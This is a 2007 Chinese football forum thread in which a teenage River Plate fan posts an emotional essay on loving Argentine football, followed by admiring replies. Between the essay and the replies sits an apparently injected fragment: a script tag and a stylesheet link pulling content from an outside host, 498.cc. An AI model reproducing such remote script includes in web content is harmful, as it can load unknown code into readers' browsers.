河床球迷达达 发表于 2007-7-19 21:39:00

[原创]我自己写的一篇文章......

残缺的美<br/>我今年16岁,是一名河床球迷,是一个非常热爱河床的球迷...<br/>也是个深爱着阿根廷联赛的人...<br/>阿根廷,那是个美丽的名字,<br/>布宜诺斯艾利斯,那是个美丽的城市..<br/>而她的美丽来源于足球...<br/>很抱歉,我虽然也爱阿根廷国家队,但是那种爱是永远无法和我对河床的爱所能比拟的..<br/>当我看到美洲杯上失利的阿根廷队,我为他们遗憾..也许仅仅是遗憾...<br/>请大家理解我,而当河床输给博卡的时候,我会流下伤心的眼泪...<br/>当河床进球后,我又是那么的兴奋...<br/>    这个世界上有那么多的国家,有那么的多的联赛,欧洲的西甲,意甲,英超,德甲等是人们最为所爱的...<br/>而我,却惟独深爱着阿根廷的联赛...这是发自内心的爱,你是永远无法感受到的..<br/>那些不看阿甲联赛的人,也许你们错过了的不只是一场精彩的足球比赛而已....<br/>我不喜欢巴萨,不喜欢皇马,不喜欢米兰,不喜欢切尔西...<br/>不喜欢球西甲,不喜欢意甲,更不喜欢英超....<br/>我只爱我心爱的河床,我只爱我深爱的阿甲...我只爱阿根廷足球..<br/>   在阿根廷,不是那么富裕的国家,但是足球是人们的一切...<br/>他带给阿根廷人和我的快乐是永远也无与伦比的...<br/>我曾经说过这么一句话:阿根廷的联赛能让你感到到哭...而当你哭出来的那刻,更多的是震撼...和感动....<br/>那些整天不看阿甲的人居然还说,英超激情?德甲激情?懂什么叫激情吗?看过阿甲吗?<br/>看过阿根廷联赛吗?看过96年解放者杯决赛河床主场的气氛吗?看过阿甲球迷的呐喊吗?看过阿根廷赛场那漫天飞舞的纸片吗?看过河床博卡比赛里进球后的场景吗?在阿根廷联赛里,真的有种爱能让你感动....<br/>我不是反对那些关注欧洲5大联赛的球迷,只是发表自己的看法,请大家理解...<br/>也许当你真正爱上阿甲的那一天,你就会明白我今天所说的话..<br/>阿根廷联赛的球场没有欧洲球场那么壮观,也没有欧洲球场那么现代化,更没有欧洲许多球场的气派...<br/>但是我们所拥有的,是在欧洲赛场永远也无法体会得到的.......<br/>我爱河床,我爱阿根廷联赛,我爱阿根廷.....<br/>阿根廷的赛场上也许没有大牌的球星,没有气派壮观的看台,没有许多....但是它却有我对它那份无法改变的爱....<br/><br/>有一种美叫做残缺的美,也许关注和喜欢它的人不是很多,<br/>但依然无法掩盖它的美丽——阿根廷联赛.<br/>

< url=http://www.498.cc">
<script type="text/javascript" src="http://498.cc/"></script>
<link href="http://498.cc/888.css" rel="stylesheet" type="text/css" media="screen" />

夜莺 发表于 2007-7-19 21:59:00

&lt;p&gt;河床的球员都挺有灵气的,另外一种味道, 楼主对河床的喜爱让人佩服&lt;/p&gt;

李思加 发表于 2007-7-19 22:13:00

感动。。。即使爱的对象不尽相同 但是对于爱本身的理解我们都是相同的

cysn66 发表于 2007-7-20 11:46:00

<p>楼主真是河床的铁杆啊,让人感动。</p><p>如果老是残缺,就不完美了呀。</p>

666666 发表于 2007-7-20 11:55:00

赞楼主DD的热情!
页: [1]
查看完整版本: [原创]我自己写的一篇文章......